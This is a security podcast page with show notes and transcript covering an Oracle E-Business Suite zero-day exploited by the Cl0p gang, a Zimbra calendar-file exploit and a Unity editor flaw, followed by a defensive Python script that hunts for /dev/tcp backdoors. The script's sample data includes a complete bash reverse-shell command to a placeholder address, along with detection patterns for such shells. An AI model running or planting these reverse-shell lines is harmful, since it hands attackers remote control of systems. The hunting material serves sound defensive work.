
SANS Stormcast Monday, October 6th, 2025: Oracle 0-Day

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9642.mp3

Oracle E-Business Suite 0-Day CVE-2025-61882
Last week, the Cl0p ransomware gang sent messages to many businesses stating that an Oracle E-Business Suite vulnerability was used to exfiltrate data. Initially, Oracle believed the root cause to be a vulnerability patched in June, but now Oracle released a patch for a new vulnerability.
https://www.oracle.com/security-alerts/alert-cve-2025-61882.html

Zimbra Exploit Analysis
An exploit against a Zimbra system prior to the patch release is analyzed. These exploits take advantage of .ics files to breach vulnerable systems.
https://strikeready.com/blog/0day-ics-attack-in-the-wild/

Unity Editor Vulnerability CVE-2025-59489
The Unity game editor suffered from a code execution vulnerability that also exposes software developed with vulnerable versions of the editor.
https://unity.com/security/sept-2025-01

Podcast Transcript

Hello and welcome to the Monday, October 6, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Denver, Colorado. And this episode is brought to you by the SANS.edu Graduate Certificate Program in Cloud Security.

Well, to start out with, we have some bad news for users of Oracle's E-Business Suite. Last week, I think it was Wednesday, Thursday, there was news coming up that many companies using Oracle's E-Business Suite did receive letters, emails from the Cl0p ransomware gang stating that their Oracle E-Business Suite had been compromised and, well, that data had been stolen. Oracle shortly after, via their chief security officer, did publish a blog post stating that they assume that the vulnerability being exploited here is a vulnerability patched as part of Oracle's critical patch update in June. So as long as you had that applied, well, you should be good and safe from any exploitation, pretty much should disregard this ransom note. Well, on Saturday, Oracle changed its stance on this. Oracle did publish an additional patch for its E-Business Suite; this patch fixes a vulnerability with a CVSS score of 9.8. According to Oracle, the vulnerability does allow the execution of arbitrary code across the network without any authentication. So certainly one of the sort of kind of worst case scenarios. And that apparently is what's behind these letters, emails from the Cl0p ransomware gang. So if you received one of those emails stating that your data may have been compromised, first of all, take it seriously, assume it's real, and, well, switch to incident response mode. This should be your highest priority on Monday. If you didn't receive one of those letters, well, hope that it didn't just end up in your spam folder, definitely still check and make sure that you haven't been compromised and apply the patch that Oracle has released this weekend. In order to apply the patch, you must have at least applied the June 2023 update for Oracle E-Business Suite. So make sure that this is applied first, but hopefully you have applied patches within the last two years, and then you're ready to apply this new update to your Oracle E-Business Suite. Overall, this is not a pretty situation, of course. Applying these patches isn't easy. This is definitely a patch that you do want to rush out. So there's definitely nothing else that you really should do on Monday if you do run Oracle's E-Business Suite other than working out how to, first of all, apply the patch and what other mitigation controls you may want to apply to the system, and also, well, double, triple, quadruple check that you are not already compromised. Oracle, as part of the advisory, did release some indicators of compromise. There are two IP addresses that apparently affected systems connect to. There are a couple of hashes of malware being used, and then, well, a fairly generic backdoor, basically just sort of piping to /dev/tcp. This is something good to look for anyway. It's not very specific, I think, to the Cl0p ransomware gang, but if you have something like this running, you are compromised. Maybe by Cl0p, maybe by someone else. Of course, there's always a chance that others have known about this vulnerability before, or at the same time, the Cl0p ransomware gang learned about it, so there is a possibility that other attacks have been launched against these systems as well.

And security company StrikeReady did publish a blog post with details regarding early exploitation attempts against Zimbra abusing a vulnerability that was patched in January. These attempts happened before a patch became available and now reveal some of the details of how attackers are abusing this vulnerability. It's relatively straightforward in hindsight. The attack uses calendar files, so .ics files, that are being sent from, well, what looks like valid government email addresses. Zimbra, the open source webmail suite, is particularly popular with non-US governments that don't necessarily trust US cloud providers and as a result are not using sort of your standard cloud-based webmail systems, but rather set up their own. And we have seen this pattern sort of play out repeatedly in the past, where vulnerabilities in these open source webmail systems are being exploited against governments.

And Unity released a critical patch for its game editor. The interesting part here is that it's not just the editor being vulnerable here, but also games developed with the editor are vulnerable and may require a re-release. The vulnerability in particular for the games is more of a privilege escalation vulnerability, but definitely if you're using this editor take a quick look and make sure that you're up to date. The patch was released late last week. The advisory is labeled September 2025, so don't discard it as being old. The patch actually was released in October. The vulnerability was originally reported to Unity in June.

And this is it for today. So thanks for listening, thanks for subscribing, liking and recommending this podcast, and talk to you again tomorrow. Bye.
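An added example, not from the podcast or from Oracle's advisory: a small Python hunt script for the generic "/dev/tcp" backdoor pattern mentioned above. It scans command lines (for instance from `ps -eo args` output or shell history), pulls out the destination host and port of any bash /dev/tcp redirection, and flags hits against a set of known-bad hosts. The sample process list and the IOC host below are constructed; substitute the IP addresses from Oracle's alert for the placeholder set.

```python
import re

# bash's /dev/tcp/<host>/<port> pseudo-device: the shell itself opens a socket
DEV_TCP_RE = re.compile(r"/dev/tcp/(?P<host>[A-Za-z0-9.\-]+)/(?P<port>\d{1,5})")
# An interactive shell (-i) wrapped around that socket is the classic reverse shell
INTERACTIVE_SHELL_RE = re.compile(r"\b(?:bash|sh|zsh)\b.*\s-i\b")


def find_dev_tcp_backdoors(lines, ioc_hosts=()):
    """Return one finding per command line that redirects to /dev/tcp/<host>/<port>.

    ioc_hosts: hosts/IPs from a published indicator list (Oracle's alert, for example);
    a finding whose destination is in that set is marked matches_ioc=True.
    """
    ioc_hosts = set(ioc_hosts)
    findings = []
    for raw in lines:
        line = raw.strip()
        m = DEV_TCP_RE.search(line)
        if not m:
            continue
        host = m.group("host")
        findings.append({
            "host": host,
            "port": int(m.group("port")),
            "interactive_shell": bool(INTERACTIVE_SHELL_RE.search(line)),
            "matches_ioc": host in ioc_hosts,
            "line": line,
        })
    return findings


# Constructed sample of a process listing; 198.51.100.23 is a TEST-NET address,
# not an indicator from Oracle's advisory.
SAMPLE_PROCESS_LIST = [
    "java -jar /u01/app/oracle/oacore.jar",                   # benign
    "bash -i >& /dev/tcp/198.51.100.23/443 0>&1",             # reverse shell pattern
    "sh -c 'exec 3<>/dev/tcp/example.test/8080; cat <&3'",    # socket without -i
    "sshd: oracle [priv]",                                    # benign
]
PLACEHOLDER_IOC_HOSTS = {"198.51.100.23"}  # replace with the advisory's IP addresses

if __name__ == "__main__":
    for f in find_dev_tcp_backdoors(SAMPLE_PROCESS_LIST, PLACEHOLDER_IOC_HOSTS):
        print(f"{f['host']}:{f['port']} interactive={f['interactive_shell']} "
              f"ioc={f['matches_ioc']}  <- {f['line']}")
```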